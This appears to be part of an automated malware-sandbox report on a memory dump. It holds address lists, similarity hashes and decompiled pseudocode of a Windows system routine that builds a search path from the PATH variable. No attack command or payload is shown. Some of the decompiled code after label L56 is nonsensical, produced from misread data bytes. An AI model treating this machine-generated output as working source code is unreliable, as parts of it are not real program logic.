                                        0x1e3bdb21
                                        0x1e3bdb24
                                        0x1e3bdcd9
                                        0x1e3bdce2
                                        0x1e3bdce5
                                        0x1e3bdd6a
                                        0x1e3bdd6d
                                        0x00000000
                                        0x1e3bdd73
                                        0x1e40b51a
                                        0x1e40b51c
                                        0x1e40b51f
                                        0x1e40b524
                                        0x00000000
                                        0x1e40b524
                                        0x1e3bdce7
                                        0x1e3bdce7
                                        0x1e3bdce7
                                        0x00000000
                                        0x1e3bdce7
                                        0x00000000
                                        0x1e3bdb2a
                                        0x1e3bdb2c
                                        0x1e3bdb31
                                        0x1e3bdb33
                                        0x1e3bdb36
                                        0x1e3bdb39
                                        0x1e3bdb3b
                                        0x1e3bdb66
                                        0x1e3bdb66
                                        0x1e3bdb3d
                                        0x1e3bdb3d
                                        0x1e3bdb3e
                                        0x1e3bdb46
                                        0x1e3bdb47
                                        0x1e3bdb49
                                        0x1e3bdb4c
                                        0x1e3bdb53
                                        0x1e3bdb55
                                        0x1e3bdb58
                                        0x1e3bdb5a
                                        0x1e40b50a
                                        0x1e40b50f
                                        0x1e40b512
                                        0x1e3bdb60
                                        0x1e3bdb60
                                        0x1e3bdb63
                                        0x1e3bdb63
                                        0x00000000
                                        0x1e3bdb63
                                        0x1e3bdb5a
                                        0x1e3bdb3b
                                        0x1e3bdb24
                                        0x1e3bdb69
                                        0x1e3bdb69
                                        0x1e3bdb6c
                                        0x1e3bdb6f
                                        0x1e3bdb74
                                        0x1e40b557
                                        0x1e40b557
                                        0x1e40b55e
                                        0x1e3bdb7a
                                        0x1e3bdb7c
                                        0x1e3bdb7f
                                        0x1e3bdb82
                                        0x1e3bdb85
                                        0x00000000
                                        0x1e3bdb8b
                                        0x1e3bdb8b
                                        0x1e3bdb8d
                                        0x1e3bdb9b
                                        0x1e3bdb9b
                                        0x1e3bdb9d
                                        0x1e3bdba0
                                        0x1e3bdba2
                                        0x1e3bdba4
                                        0x1e3bdba7
                                        0x1e3bdba9
                                        0x1e3bdbae
                                        0x1e3bdbae
                                        0x1e3bdbb1
                                        0x1e3bdbb4
                                        0x1e3bdbb4
                                        0x1e3bdbb7
                                        0x1e3bdbba
                                        0x1e3bdcd2
                                        0x1e3bdcd4
                                        0x00000000
                                        0x1e3bdbc0
                                        0x1e3bdbc0
                                        0x1e3bdbd2
                                        0x1e3bdbd7
                                        0x1e3bdbda
                                        0x1e3bdbdd
                                        0x1e3bdbdf
                                        0x00000000
                                        0x1e3bdbe5
                                        0x1e3bdbe5
                                        0x1e3bdbee
                                        0x1e3bdbf1
                                        0x1e40b541
                                        0x1e40b544
                                        0x00000000
                                        0x1e40b546
                                        0x1e40b546
                                        0x00000000
                                        0x1e40b546
                                        0x1e3bdbf7
                                        0x1e3bdbf7
                                        0x1e3bdbfd
                                        0x1e3bdbfd
                                        0x1e3bdbff
                                        0x1e3bdc0b
                                        0x1e3bdc15
                                        0x1e3bdc1b
                                        0x1e3bdc1d
                                        0x1e3bdc21
                                        0x1e3bdc21
                                        0x1e3bdc23
                                        0x1e3bdc23
                                        0x1e3bdc26
                                        0x1e3bdc29
                                        0x1e3bdc2b
                                        0x00000000
                                        0x00000000
                                        0x1e3bdc31
                                        0x1e3bdc34
                                        0x1e3bdc36
                                        0x1e3bdcbf
                                        0x1e3bdcbf
                                        0x1e3bdcc2
                                        0x00000000
                                        0x1e3bdc3c
                                        0x1e3bdc41
                                        0x1e3bdc43
                                        0x00000000
                                        0x1e3bdc45
                                        0x1e3bdc45
                                        0x1e3bdc47
                                        0x00000000
                                        0x1e3bdc4d
                                        0x1e3bdc4d
                                        0x1e3bdc50
                                        0x1e3bdc52
                                        0x1e3bdc55
                                        0x1e3bdcfa
                                        0x1e3bdcfe
                                        0x1e3bdd08
                                        0x1e3bdd0a
                                        0x1e3bdd0c
                                        0x00000000
                                        0x1e3bdd12
                                        0x1e3bdd15
                                        0x1e3bdd2d
                                        0x1e3bdd2f
                                        0x1e3bdd32
                                        0x1e3bdd35
                                        0x00000000
                                        0x1e3bdd35
                                        0x1e3bdc5b
                                        0x1e3bdc5b
                                        0x1e3bdc5e
                                        0x1e3bdc61
                                        0x1e3bdc64
                                        0x1e3bdc67
                                        0x1e3bdc67
                                        0x1e3bdc6a
                                        0x1e3bdc6c
                                        0x1e3bdc8e
                                        0x1e3bdc8e
                                        0x1e3bdc91
                                        0x1e3bdc93
                                        0x1e3bdcce
                                        0x1e3bdcce
                                        0x1e3bdc95
                                        0x1e3bdc9c
                                        0x1e3bdc6e
                                        0x1e3bdc72
                                        0x1e3bdc75
                                        0x1e3bdc77
                                        0x1e3bdc79
                                        0x1e40b551
                                        0x1e40b551
                                        0x00000000
                                        0x1e3bdc7f
                                        0x1e3bdc7f
                                        0x1e3bdc81
                                        0x00000000
                                        0x1e3bdc83
                                        0x1e3bdc86
                                        0x1e3bdc88
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3bdc88
                                        0x1e3bdc81
                                        0x1e3bdc79
                                        0x1e3bdc6c
                                        0x1e3bdc55
                                        0x1e3bdc47
                                        0x1e3bdc43
                                        0x00000000
                                        0x1e3bdc36
                                        0x1e3bdc23
                                        0x00000000
                                        0x1e3bdbff
                                        0x1e3bdbf1
                                        0x1e3bdbdf
                                        0x1e3bdb8f
                                        0x1e3bdb92
                                        0x1e3bdb95
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3bdb95
                                        0x1e3bdb8d
                                        0x1e3bdb85
                                        0x1e3bdb74
                                        0x1e3bdc9f
                                        0x1e3bdca2
                                        0x1e3bdcb0
                                        0x1e3bdcb0
                                        0x1e3bdad1
                                        0x1e40b4e5
                                        0x1e40b4c8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3bd831
                                        0x1e3bd80d
                                        0x00000000
                                        0x1e3bd800
                                        0x1e40b47f
                                        0x1e40b485
                                        0x00000000
                                        0x1e40b485
                                        0x1e3bd665
                                        0x1e3bd652
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
                                        • Instruction ID: 990119460426a5bba8234111266570bc9a48462a151cc847a07367bce9c12197
                                        • Opcode Fuzzy Hash: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
                                        • Instruction Fuzzy Hash: BEE1D634A00359CFDB24CF15C998BA9B7B6BF45314F4143AAD80AA7790D734AD85CF52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3D2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 82%
                                        			E1E3D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				signed int _t235;
				signed int _t240;
				signed int _t242;
				intOrPtr _t244;
				signed int _t247;
				signed int _t254;
				signed int _t257;
				signed int _t265;
				signed int _t271;
				signed int _t273;
				void* _t275;
				signed int _t276;
				unsigned int _t279;
				signed int _t283;
				signed int _t287;
				signed int _t291;
				intOrPtr _t304;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t320;
				signed int _t321;
				void* _t324;
				signed int _t325;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				void* _t333;

				_t327 = _t329;
				_t330 = _t329 - 0x4c;
				_v8 =  *0x1e49d360 ^ _t327;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t320 = 0x1e49b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t279 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t271 = 0x48;
				_t301 = 0 | _t333 == 0x00000000;
				_t313 = 0;
				_v37 = _t333 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t271 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t321 = 0xc0000106;
						goto L32;
					} else {
						_t320 = L1E3C4620(_t279,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t271);
						_v52 = _t320;
						__eflags = _t320;
						if(_t320 == 0) {
							_t321 = 0xc0000017;
							goto L32;
						} else {
							 *(_t320 + 0x44) =  *(_t320 + 0x44) & 0x00000000;
							_t50 = _t320 + 0x48; // 0x48
							_t315 = _t50;
							_t301 = _v32;
							 *(_t320 + 0x3c) = _t271;
							_t273 = 0;
							 *((short*)(_t320 + 0x30)) = _v48;
							__eflags = _t301;
							if(_t301 != 0) {
								 *(_t320 + 0x18) = _t315;
								__eflags = _t301 - 0x1e498478;
								 *_t320 = ((0 | _t301 == 0x1e498478) - 0x00000001 & 0xfffffffb) + 7;
								E1E3EF3E0(_t315,  *((intOrPtr*)(_t301 + 4)),  *_t301 & 0x0000ffff);
								_t301 = _v32;
								_t330 = _t330 + 0xc;
								_t273 = 1;
								__eflags = _a8;
								_t315 = _t315 + (( *_t301 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t265 = E1E4339F2(_t315);
									_t301 = _v32;
									_t315 = _t265;
								}
							}
							_t283 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t321 = _v68;
								__eflags = 0;
								 *((short*)(_t315 - 2)) = 0;
								goto L32;
							} else {
								_t271 = _t320 + _t273 * 4;
								_v56 = _t271;
								do {
									__eflags = _t301;
									if(_t301 != 0) {
										_t230 =  *(_v60 + _t283 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t271 =  *(_v60 + _t283 * 4);
										 *(_t271 + 0x18) = _t315;
										_t234 =  *(_v60 + _t283 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M1E3D2959))) {
												case 0:
													__ax =  *0x1e498488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e49848c, __ax & 0x0000ffff);
														__eax =  *0x1e498488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E1E3EF3E0(_t315, _v80, _v64);
													_t260 = _v64;
													goto L26;
												case 2:
													 *0x1e498480 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e498484,  *0x1e498480 & 0x0000ffff);
													__eax =  *0x1e498480 & 0x0000ffff;
													__eax = ( *0x1e498480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E1E3EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E1E3EF3E0(_t315, _v76, _v36);
														_t260 = _v36;
													}
													L26:
													_t330 = _t330 + 0xc;
													_t315 = _t315 + (_t260 >> 1) * 2 + 2;
													__eflags = _t315;
													L27:
													_push(0x3b);
													_pop(_t262);
													 *((short*)(_t315 - 2)) = _t262;
													goto L28;
												case 6:
													__ebx =  *0x1e49575c;
													__eflags = __ebx - 0x1e49575c;
													if(__ebx != 0x1e49575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E1E3EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x1e49575c;
														} while (__ebx != 0x1e49575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1e498478 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e49847c,  *0x1e498478 & 0x0000ffff);
													__eax =  *0x1e498478 & 0x0000ffff;
													__eax = ( *0x1e498478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E1E4339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1e496e58 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e496e5c,  *0x1e496e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1e496e58 & 0x0000ffff;
													__eax = ( *0x1e496e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t283 = _v16;
													_t301 = _v32;
													L29:
													_t271 = _t271 + 4;
													__eflags = _t271;
													_v56 = _t271;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t283 = _t283 + 1;
									_v16 = _t283;
									__eflags = _t283 - _v48;
								} while (_t283 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t313 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M1E3D2935))) {
							case 0:
								__ax =  *0x1e498488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t301 =  &_v64;
								_v80 = E1E3D2E3E(0,  &_v64);
								_t271 = _t271 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1e498480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1e498480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E1E3BEEF0(0x1e4979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E1E3BEB70(__ecx, 0x1e4979a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t321;
												if(_t321 < 0) {
													L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t279 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1e497b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E1E3BEB70(__ecx, 0x1e4979a0);
										__eax = _v52;
										L36:
										_pop(_t314);
										_pop(_t322);
										__eflags = _v8 ^ _t327;
										_pop(_t272);
										return E1E3EB640(_t209, _t272, _v8 ^ _t327, _t301, _t314, _t322);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t267 = _v56;
								if(_v56 != 0) {
									_t301 =  &_v36;
									_t269 = E1E3D2E3E(_t267,  &_v36);
									_t279 = _v36;
									_v76 = _t269;
								}
								if(_t279 == 0) {
									goto L44;
								} else {
									_t271 = _t271 + 2 + _t279;
								}
								goto L14;
							case 6:
								__eax =  *0x1e495764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1e498478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1e498478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1e496e58 & 0x0000ffff;
								__eax = ( *0x1e496e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t313 = _t313 + 1;
								if(_t313 >= _v48) {
									goto L16;
								} else {
									_t301 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					__eflags = _t234 - 0x3d28661e;
					_push(ds);
					asm("loopne 0x29");
					__eflags = _t234 - 0x3d262e1e;
					 *0x3d26051e =  *0x3d26051e - _t271;
					ds = ds;
					_t275 = ds;
					_push(ds);
					_t235 = _t330;
					_t332 = _t234;
					 *0x415b351e =  *0x415b351e - _t275;
					_push(ds);
					__eflags = _t235 - 0x3d28801e;
					_push(ds);
					__eflags = _t235 *  *_t315 - 0x3d281e1e;
					_push(ds);
					_t324 = _t320 + 1 - 1;
					 *0x3d275d1e =  *0x3d275d1e - _t275;
					_push(ds);
					asm("fcomp dword [ebx+0x41]");
					_push(ds);
					__eflags = 0x28 - 0x415c341e;
					_push(ds);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x1e47ff00);
					E1E3FD08C(_t275, _t315, _t324);
					_v44 =  *[fs:0x18];
					_t316 = 0;
					 *_a24 = 0;
					_t276 = _a12;
					__eflags = _t276;
					if(_t276 == 0) {
						_t240 = 0xc0000100;
					} else {
						_v8 = 0;
						_t325 = 0xc0000100;
						_v52 = 0xc0000100;
						_t242 = 4;
						while(1) {
							_v40 = _t242;
							__eflags = _t242;
							if(_t242 == 0) {
								break;
							}
							_t291 = _t242 * 0xc;
							_v48 = _t291;
							__eflags = _t276 -  *((intOrPtr*)(_t291 + 0x1e381664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t257 = E1E3EE5C0(_a8,  *((intOrPtr*)(_t291 + 0x1e381668)), _t276);
									_t332 = _t332 + 0xc;
									__eflags = _t257;
									if(__eflags == 0) {
										_t325 = E1E4251BE(_t276,  *((intOrPtr*)(_v48 + 0x1e38166c)), _a16, _t316, _t325, __eflags, _a20, _a24);
										_v52 = _t325;
										break;
									} else {
										_t242 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t242 = _t242 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t325;
						__eflags = _t325;
						if(_t325 < 0) {
							__eflags = _t325 - 0xc0000100;
							if(_t325 == 0xc0000100) {
								_t287 = _a4;
								__eflags = _t287;
								if(_t287 != 0) {
									_v36 = _t287;
									__eflags =  *_t287 - _t316;
									if( *_t287 == _t316) {
										_t325 = 0xc0000100;
										goto L76;
									} else {
										_t304 =  *((intOrPtr*)(_v44 + 0x30));
										_t244 =  *((intOrPtr*)(_t304 + 0x10));
										__eflags =  *((intOrPtr*)(_t244 + 0x48)) - _t287;
										if( *((intOrPtr*)(_t244 + 0x48)) == _t287) {
											__eflags =  *(_t304 + 0x1c);
											if( *(_t304 + 0x1c) == 0) {
												L106:
												_t325 = E1E3D2AE4( &_v36, _a8, _t276, _a16, _a20, _a24);
												_v32 = _t325;
												__eflags = _t325 - 0xc0000100;
												if(_t325 != 0xc0000100) {
													goto L69;
												} else {
													_t316 = 1;
													_t287 = _v36;
													goto L75;
												}
											} else {
												_t247 = E1E3B6600( *(_t304 + 0x1c));
												__eflags = _t247;
												if(_t247 != 0) {
													goto L106;
												} else {
													_t287 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t325 = E1E3D2C50(_t287, _a8, _t276, _a16, _a20, _a24, _t316);
											L76:
											_v32 = _t325;
											goto L69;
										}
									}
									goto L108;
								} else {
									E1E3BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t325 = _a24;
									_t254 = E1E3D2AE4( &_v36, _a8, _t276, _a16, _a20, _t325);
									_v32 = _t254;
									__eflags = _t254 - 0xc0000100;
									if(_t254 == 0xc0000100) {
										_v32 = E1E3D2C50(_v36, _a8, _t276, _a16, _a20, _t325, "true");
									}
									_v8 = _t316;
									E1E3D2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t240 = _t325;
					}
					L70:
					return E1E3FD0D1(_t240);
				}
				L108:
			}




















































                                        0x1e3d2584
                                        0x1e3d2586
                                        0x1e3d2590
                                        0x1e3d2596
                                        0x1e3d2597
                                        0x1e3d2598
                                        0x1e3d2599
                                        0x1e3d259e
                                        0x1e3d25a4
                                        0x1e3d25a9
                                        0x1e3d25ac
                                        0x1e3d25ae
                                        0x1e3d25b1
                                        0x1e3d25b2
                                        0x1e3d25b5
                                        0x1e3d25b8
                                        0x1e3d25bb
                                        0x1e3d25bc
                                        0x1e3d25bf
                                        0x1e3d25c2
                                        0x1e3d25c5
                                        0x1e3d25c6
                                        0x1e3d25cb
                                        0x1e3d25ce
                                        0x1e3d25d8
                                        0x1e3d25db
                                        0x1e3d25dd
                                        0x1e3d25de
                                        0x1e3d25e1
                                        0x1e3d25e3
                                        0x1e3d25e9
                                        0x1e3d26da
                                        0x1e3d26da
                                        0x1e3d26dd
                                        0x1e3d26e2
                                        0x1e415b56
                                        0x00000000
                                        0x1e3d26e8
                                        0x1e3d26f9
                                        0x1e3d26fb
                                        0x1e3d26fe
                                        0x1e3d2700
                                        0x1e415b60
                                        0x00000000
                                        0x1e3d2706
                                        0x1e3d2706
                                        0x1e3d270a
                                        0x1e3d270a
                                        0x1e3d270d
                                        0x1e3d2713
                                        0x1e3d2716
                                        0x1e3d2718
                                        0x1e3d271c
                                        0x1e3d271e
                                        0x1e415b6c
                                        0x1e415b6f
                                        0x1e415b7f
                                        0x1e415b89
                                        0x1e415b8e
                                        0x1e415b93
                                        0x1e415b96
                                        0x1e415b9c
                                        0x1e415ba0
                                        0x1e415ba3
                                        0x1e415bab
                                        0x1e415bb0
                                        0x1e415bb3
                                        0x1e415bb3
                                        0x1e415ba3
                                        0x1e3d2724
                                        0x1e3d2726
                                        0x1e3d2729
                                        0x1e3d272c
                                        0x1e3d279d
                                        0x1e3d279d
                                        0x1e3d27a0
                                        0x1e3d27a2
                                        0x00000000
                                        0x1e3d272e
                                        0x1e3d272e
                                        0x1e3d2731
                                        0x1e3d2734
                                        0x1e3d2734
                                        0x1e3d2736
                                        0x1e415bc1
                                        0x1e415bc1
                                        0x1e415bc4
                                        0x00000000
                                        0x1e415bca
                                        0x1e415bca
                                        0x1e415bcd
                                        0x00000000
                                        0x1e415bd3
                                        0x00000000
                                        0x1e415bd3
                                        0x1e415bcd
                                        0x1e3d273c
                                        0x1e3d273c
                                        0x1e3d2742
                                        0x1e3d2747
                                        0x1e3d274a
                                        0x1e3d274d
                                        0x1e3d2750
                                        0x00000000
                                        0x1e3d2756
                                        0x1e3d2756
                                        0x00000000
                                        0x1e3d2902
                                        0x1e3d2908
                                        0x1e3d290b
                                        0x00000000
                                        0x1e3d2911
                                        0x1e3d291c
                                        0x1e3d2921
                                        0x00000000
                                        0x1e3d2921
                                        0x00000000
                                        0x00000000
                                        0x1e3d2880
                                        0x1e3d2887
                                        0x1e3d288c
                                        0x00000000
                                        0x00000000
                                        0x1e3d2805
                                        0x1e3d280a
                                        0x1e3d2814
                                        0x1e3d2816
                                        0x00000000
                                        0x00000000
                                        0x1e3d281e
                                        0x1e3d2821
                                        0x1e3d2823
                                        0x00000000
                                        0x1e3d2829
                                        0x1e3d2829
                                        0x1e3d2831
                                        0x1e3d283c
                                        0x1e3d283e
                                        0x00000000
                                        0x1e3d283e
                                        0x00000000
                                        0x00000000
                                        0x1e3d284e
                                        0x1e3d2850
                                        0x1e3d2851
                                        0x1e3d2854
                                        0x1e3d2857
                                        0x1e3d285a
                                        0x1e3d285c
                                        0x1e3d285d
                                        0x00000000
                                        0x00000000
                                        0x1e3d275d
                                        0x1e3d2761
                                        0x00000000
                                        0x1e3d2767
                                        0x1e3d276e
                                        0x1e3d2773
                                        0x1e3d2773
                                        0x1e3d2776
                                        0x1e3d2778
                                        0x1e3d277e
                                        0x1e3d277e
                                        0x1e3d2781
                                        0x1e3d2781
                                        0x1e3d2783
                                        0x1e3d2784
                                        0x00000000
                                        0x00000000
                                        0x1e415bd8
                                        0x1e415bde
                                        0x1e415be4
                                        0x1e415be6
                                        0x1e415be8
                                        0x1e415be9
                                        0x1e415bee
                                        0x1e415bf8
                                        0x1e415bff
                                        0x1e415c01
                                        0x1e415c04
                                        0x1e415c07
                                        0x1e415c0b
                                        0x1e415c0d
                                        0x1e415c0d
                                        0x1e415c15
                                        0x1e415c18
                                        0x1e415c1b
                                        0x1e415c1b
                                        0x1e415c1e
                                        0x00000000
                                        0x00000000
                                        0x1e3d28c3
                                        0x1e3d28c8
                                        0x1e3d28d2
                                        0x1e3d28d4
                                        0x1e3d28d8
                                        0x1e3d28db
                                        0x1e415c26
                                        0x1e415c28
                                        0x1e415c2d
                                        0x1e415c2d
                                        0x00000000
                                        0x00000000
                                        0x1e415c34
                                        0x1e415c36
                                        0x1e415c49
                                        0x1e415c4e
                                        0x1e415c54
                                        0x1e415c5b
                                        0x1e415c5d
                                        0x1e415c60
                                        0x1e3d2788
                                        0x1e3d2788
                                        0x1e3d278b
                                        0x1e3d278e
                                        0x1e3d278e
                                        0x1e3d278e
                                        0x1e3d2791
                                        0x00000000
                                        0x00000000
                                        0x1e3d2756
                                        0x1e3d2750
                                        0x00000000
                                        0x1e3d2794
                                        0x1e3d2794
                                        0x1e3d2795
                                        0x1e3d2798
                                        0x1e3d2798
                                        0x00000000
                                        0x1e3d2734
                                        0x1e3d272c
                                        0x1e3d2700
                                        0x1e3d25ef
                                        0x1e3d25ef
                                        0x1e3d25ef
                                        0x1e3d25f2
                                        0x1e3d25f8
                                        0x00000000
                                        0x00000000
                                        0x1e3d25fe
                                        0x00000000
                                        0x1e3d28e6
                                        0x1e3d28ec
                                        0x1e3d28ef
                                        0x1e3d28f5
                                        0x1e3d28f8
                                        0x1e3d28f8
                                        0x00000000
                                        0x1e3d28f8
                                        0x00000000
                                        0x00000000
                                        0x1e3d2866
                                        0x1e3d2866
                                        0x1e3d2876
                                        0x1e3d2879
                                        0x00000000
                                        0x00000000
                                        0x1e3d27e0
                                        0x1e3d27e7
                                        0x1e3d27e9
                                        0x1e3d27eb
                                        0x1e415afd
                                        0x00000000
                                        0x1e415afd
                                        0x00000000
                                        0x00000000
                                        0x1e3d2633
                                        0x1e3d2638
                                        0x1e3d263b
                                        0x1e3d263c
                                        0x1e3d263e
                                        0x1e3d2640
                                        0x1e3d2642
                                        0x1e3d2647
                                        0x1e3d2649
                                        0x1e3d264e
                                        0x1e3d2650
                                        0x1e3d2653
                                        0x1e3d2659
                                        0x1e3d26a2
                                        0x1e3d26a7
                                        0x1e3d26ac
                                        0x1e3d26b2
                                        0x1e415b11
                                        0x1e415b15
                                        0x1e415b17
                                        0x00000000
                                        0x1e3d26b8
                                        0x1e3d26b8
                                        0x1e3d26ba
                                        0x1e3d27a6
                                        0x1e3d27a6
                                        0x1e3d27a9
                                        0x1e3d27ab
                                        0x1e3d27b9
                                        0x1e3d27b9
                                        0x1e3d27be
                                        0x1e3d27c1
                                        0x1e3d27c3
                                        0x1e3d27c5
